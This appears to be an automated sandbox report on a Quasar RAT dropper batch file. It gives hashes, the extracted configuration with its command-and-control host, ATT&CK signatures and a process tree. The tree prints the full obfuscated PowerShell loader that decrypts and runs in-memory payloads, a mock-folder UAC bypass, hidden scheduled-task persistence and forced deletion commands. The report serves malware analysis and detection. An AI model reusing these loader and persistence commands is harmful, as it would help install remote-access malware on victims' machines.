Overview

overview

10

Static

static

1

SCV.cmd

windows7-x64

3

SCV.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-10-2024 09:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SCV.cmd

  • Size

    537KB

  • MD5

    d20bf8dba792e2edc3e0eb7e5c30b32b

  • SHA1

    7094e6e59004962f3d3161aa3016ecfcf2b3a64f

  • SHA256

    1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485

  • SHA512

    c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f

  • SSDEEP

    12288:100ynYtHxuu7eaSvaoBTiFrrdkrw1vH5FiaPQdgEMlB:10KtR3lehBAr/1vian1B

Score
10/10
quasaroffice04defense_evasiondiscoveryexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes
  • encryption_key

    6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SCV.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:732
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\SCV.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:3840
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • Blocklisted process makes network request
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4608
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3196
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3556
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3704
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3500
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4972
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1604
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1824
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2948
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4976
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('21+lHVoT1nOIUg8Jroa46Hm/UH9/i9xpWUh96ZETS7Q='); $aes_var.IV=[System.Convert]::FromBase64String('E1cBH4odW5y1kT4uMPBWSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$dxBNu=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$Hocfu=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$PWlBw=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($dxBNu, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $PWlBw.CopyTo($Hocfu); $PWlBw.Dispose(); $dxBNu.Dispose(); $Hocfu.Dispose(); $Hocfu.ToArray();}function execute_function($param_var,$param2_var){ IEX '$ixgug=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$QSlWJ=$ixgug.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$QSlWJ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$acAst = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $acAst;$XJQkp=[System.IO.File]::ReadAllText($acAst).Split([Environment]::NewLine);foreach ($ATsQv in $XJQkp) { if ($ATsQv.StartsWith('SwDUuRoqKFYQvQkNWaJm')) { $yiXjU=$ATsQv.Substring(20); break; }}$payloads_var=[string[]]$yiXjU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2324
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                  7⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4296
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3096
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2304
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:856
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:456
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1820
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:756
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3612
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1536
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 960
              5⤵
              • Program crash
              PID:3132
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4712
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SCV')
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4460
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2028
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1824 -ip 1824
      1⤵
        PID:716

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        1KB

        MD5

        928d36ad618a369ffebf44885d07cf81

        SHA1

        edf5a353a919c1873af8e6a0dfafa4c38c626975

        SHA256

        d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea

        SHA512

        4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Filesize

        53KB

        MD5

        3337d66209faa998d52d781d0ff2d804

        SHA1

        6594b85a70f998f79f43cdf1ca56137997534156

        SHA256

        9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

        SHA512

        8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        19KB

        MD5

        313cc50164ee0cf3577ce4bcfc2ba9e4

        SHA1

        b692779a501806e6c17ea82b8c23fca40470800c

        SHA256

        3c36507c915846e12b714c75a63f6f71bb0458b1ef50965f7c9fc02b94ec6a0f

        SHA512

        083aee821296cb88454a5012ea12a5da7a7b69fcbf00f947fb449e991f7ad8dfc8d294aedada119397fde80e31639c6fe9601bd555933b5564c37f0d63cd6f01

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        19KB

        MD5

        8be9775f49499ba75f94dace04a7a870

        SHA1

        5c80c5674ec75fb115f37f5a3d0e92edec631aac

        SHA256

        ad23aedd8d426551041feef18edf1bcbe1902f210c5f216a0503fee356630d52

        SHA512

        a0702bc5f7887e88347c361338e29e403478d7b3e604a05b7eb925c54a253a73788e6a63f79fe2798767143a0546e3e30790704a1c00188b81766e9960e2b207

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        21KB

        MD5

        f1e3d0f7d6cb0caa4a5afef20578f774

        SHA1

        8c0f28a13f154e7330cea83885b827f5c17f8d33

        SHA256

        0ea3b45846b96352a0742b629f4a0ca4f6b30012f39caf3cbd11629f84126904

        SHA512

        60a16f5964b30967bf2165eeef3994169b7bf80570ac1b3f7cd8c7079720814c4c71ce7f1ad187a5b19af35bbaf3ac81f4e52cc1c8caee72a7f657f5e28e7ac7

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        1KB

        MD5

        dd441d0a748b190d77c235b91b64d7ba

        SHA1

        da5b187be2db701d6bfd1ccb789a601662c9e522

        SHA256

        9963e74f79fefb376a2ec3b220376c166ce8afd175f132ba8e05b9f04a62b59c

        SHA512

        5dc4b30f3572d00d223f3113390a5fb3162ed58727a446895fb0a3364dd5bdf0f8262ee1c2e3d3344a6d1cbb20d3169dfdfa8e49e12d8d15bdc9f8818936a149

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        19KB

        MD5

        c20842afb589a45945f1bb6dbe891f88

        SHA1

        337477ce5697c31459bba2689b7595e0b2a5a17a

        SHA256

        ce12a090783525b73bdb4f7d9f234a166de774fe15415f1e3e00005c7823eaab

        SHA512

        bac39fac1c7ae64b951e0502ea26dd32f0c88df1c42edc8f6fd36f380f3d4bc09d7fd59b68c954a7fe2e6fef734e0e1169fd12a68a21ddc7f35007a5e380bd42

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        19KB

        MD5

        3f1a35a393ab3bc8379291119b0b3e15

        SHA1

        d04ad4cdb3796d775d16712126e6b7aac13fad40

        SHA256

        d9251632b486a75090b1a2c163cec2d7b5c29097117ea8a2136d5c2656e96593

        SHA512

        2efd750e0ef543e87c4dcd163121fa84b3077aeea19ee89b0bcabefe49a3f643a24a57922662551d4f5c989f66824e993764fd8fd52bbb70981c73643161a6f0

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        19KB

        MD5

        9f434cef13917caed127f993c3642226

        SHA1

        da178dad741559d848fc21d5857cce9ed812764c

        SHA256

        81a544243798f977840a726d04c82211498a35db5caa9528e5ec1e060f183714

        SHA512

        2323cef9d6438fec2768e483dc1b90400763e2bf08d2899c32f839c1d6095928df9481e874b2f22cdedb45a7313fdb074ade5ffd4bf21e418d9ef1dccee5a057

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        17KB

        MD5

        ab0c7108dcf3e45cb149d5a0eeca193d

        SHA1

        7e5dd5a4637386d9f42b34abc2e7f64f389176ed

        SHA256

        b21773727f5add75806d61e3f02ad02949fe123a466f4417689e2a21f965959a

        SHA512

        1df78035d047b2a81678a8556ad45a048bf8c566da4b8fc91430f5eab6ec8ffb5561771e8ad440dd979fba8682b528293f947db3a09ecf28057821c250591e9c

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        21KB

        MD5

        962b163bebdfa04ad74132f5f81f08c5

        SHA1

        19269e7839b36ee19a9155f4535f6f9d49419ad0

        SHA256

        52e828b8f4c5f686a9ccdafec4efbcdcbcb47d89359c105b3f98701516aa7dbb

        SHA512

        c33a01915e66731becc46dfe94be31474ab64223bd7e5890415595fe6391d68950e50913c5538af46fe7d52606756a531c8261bdfee16d920237324fd9fa9b14

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\SC.cmd
        Filesize

        537KB

        MD5

        d20bf8dba792e2edc3e0eb7e5c30b32b

        SHA1

        7094e6e59004962f3d3161aa3016ecfcf2b3a64f

        SHA256

        1f788a79d0a95bd4957d5a9c3314a80aaf9acdd3bccaff916c4483a8c28a0485

        SHA512

        c68d6aac5303c5d1b7ca42c310fa21fa62f0486a2d95bbfa7b0485969634b3fd9447a5cc79f6086954022080c91777f9acb40c3c2718b09d2dac75821c816a0f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hnhdyg1.pnm.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd
        Filesize

        1.6MB

        MD5

        d7239bc304b1d9d4ae192e2570419d53

        SHA1

        dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

        SHA256

        7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

        SHA512

        d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

        Download Submit

      • C:\Windows \System32\ComputerDefaults.exe
        Filesize

        66KB

        MD5

        cfa65b13918526579371c138108a7ddb

        SHA1

        28bc560c542c405e08001f95c4ea0511e5211035

        SHA256

        4c70fea1c4f9b78955eb840c11c6c81f1d860485e090526a8e8176d98b1be3d6

        SHA512

        7ad417e862c38f1032b300735c00050435f0dd1d816e93b9a466adf3bc092be770ebf59c1617db2281c7cf982a75e6c93d927d5784132aa2c6292f3e950eca88

        Download Submit

      • C:\Windows \System32\MLANG.dll
        Filesize

        93KB

        MD5

        dc73eb0945a5e0246479de101537c9d8

        SHA1

        b4a9d97c2c6a43944a92bc6356e9be2582918da7

        SHA256

        a1f6562dab180a4c2967eab04cf6f39e3f19c99068824230b7c32891da8aba73

        SHA512

        0bf6c18bc1bf62b3025128a419091ca3a0239bcfb519007549dfa350584890ccce30115cb9c3f72e647c3d4c142cec09bba8842e6666513f3358f2557fe96f29

        Download Submit

      • memory/756-167-0x0000000006B00000-0x0000000006B22000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1536-210-0x0000000070810000-0x000000007085C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2028-189-0x0000000070810000-0x000000007085C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3196-25-0x0000000074A70000-0x0000000075220000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3196-26-0x0000000074A70000-0x0000000075220000-memory.dmp

